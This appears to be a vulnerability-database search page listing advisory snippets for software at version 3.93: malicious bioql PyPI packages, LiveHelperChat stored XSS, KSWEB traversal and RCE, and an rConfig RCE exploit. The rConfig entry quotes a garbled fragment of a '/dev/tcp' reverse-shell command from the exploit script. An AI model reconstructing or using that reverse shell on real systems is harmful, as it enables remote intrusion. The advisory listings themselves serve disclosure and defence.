18 matches found
EUVD-2022-0462
Malicious code in bioql PyPI...
EUVD-2022-0717
Malicious code in bioql PyPI...
EUVD-2022-0735
Malicious code in bioql PyPI...
EUVD-2022-0833
Malicious code in bioql PyPI...
EUVD-2022-1217
Malicious code in bioql PyPI...
EUVD-2022-1029
Malicious code in bioql PyPI...
CVE-2022-0387
Cross-site Scripting XSS - Stored in Packagist remdex/livehelperchat prior to 3.93v...
PT-2022-13298 · Remdex · Livehelperchat
Name of the Vulnerable Software and Affected Versions: remdex/livehelperchat versions prior to 3.93v Description: The issue is related to Cross-site Scripting XSS - Stored. This means an attacker can inject malicious scripts into the application, which are then stored and executed by the...
GHSA-57QF-82HH-2HMC Cross-site Scripting in LiveHelperChat
LiveHelperChat prior to version 3.93 is vulnerable to cross-site scripting...
livehelperchat cross-site scripting vulnerability (CNVD-2022-08146)
livehelperchat is available through live helper chat and can be used to provide live support on the website for free. Livehelperchat has a cross-site scripting vulnerability in version 3.93 that stems from the lack of proper validation of client-side data in the WEB application. An attacker can...
PT-2022-13151 · Unknown · Livehelperchat
Name of the Vulnerable Software and Affected Versions: LiveHelperChat versions prior to 3.93 Description: The issue is a stored Cross-site Scripting XSS vulnerability. It allows attackers to inject malicious scripts into the application, potentially leading to unauthorized access or data theft. T...
PT-2022-13152 · Unknown · Livehelperchat
Name of the Vulnerable Software and Affected Versions: LiveHelperChat versions prior to 3.93 Description: The issue is related to a Cross-site Scripting XSS - Stored vulnerability. This type of vulnerability allows an attacker to inject malicious scripts into a website, which can then be executed...
livehelperchat 跨站脚本漏洞
livehelperchat is a chat via a live helper that provides free live support on a website. A cross-site scripting vulnerability exists in livehelperchat that stems from the presence of xss in Packagist remdex livehelperchat prior to 3.93v. An attacker could exploit this vulnerability to execute...
rConfig 3.93 Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
CVE-2019-16198
KSLabs KSWEB 3.93 allows ../ directory traversal, as demonstrated by the hostFile parameter...
Directory traversal
KSLabs KSWEB 3.93 allows ../ directory traversal, as demonstrated by the hostFile parameter...
CVE-2019-16198
CVE-2019-16198 affects KSLabs KSWEB 3.93. The issue is a directory traversal in the hostFile parameter handling, enabling an attacker to traverse directories and view system files. Public references across multiple feeds (NVD, CNVD, Red Hat, PRION, CVE records) consistently describe this vulnerab...
CVE-2019-15766
CVE-2019-15766 affects the KSLABS KSWEB Android app (v3.93). An authenticated attacker can trigger remote code execution by sending a POST to the AJAX handler with configFile (arbitrary file path) and config_text (content to write), potentially writing and executing a PHP file in the device’s pub...